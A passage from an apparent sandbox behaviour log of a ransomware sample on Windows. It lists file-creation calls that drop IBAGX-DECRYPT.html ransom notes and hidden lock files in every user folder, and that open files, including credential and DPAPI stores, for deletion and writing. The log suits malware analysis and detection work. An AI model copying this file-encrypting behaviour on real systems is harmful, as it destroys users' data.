Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Temp\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Temp\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\LocalLow\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\LocalLow\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Credentials\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Credentials\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Application Data\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Default\Application Data\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Contacts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Contacts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Contacts\Administrator.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Cookies\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Cookies\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Desktop\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Desktop\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Documents\My Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Documents\My Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Documents\My Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Documents\My Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Documents\My Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Documents\My Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Downloads\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Downloads\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Favorites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Favorites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Favorites\Links\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Favorites\Links\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Favorites\Links\Web Slice Gallery.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
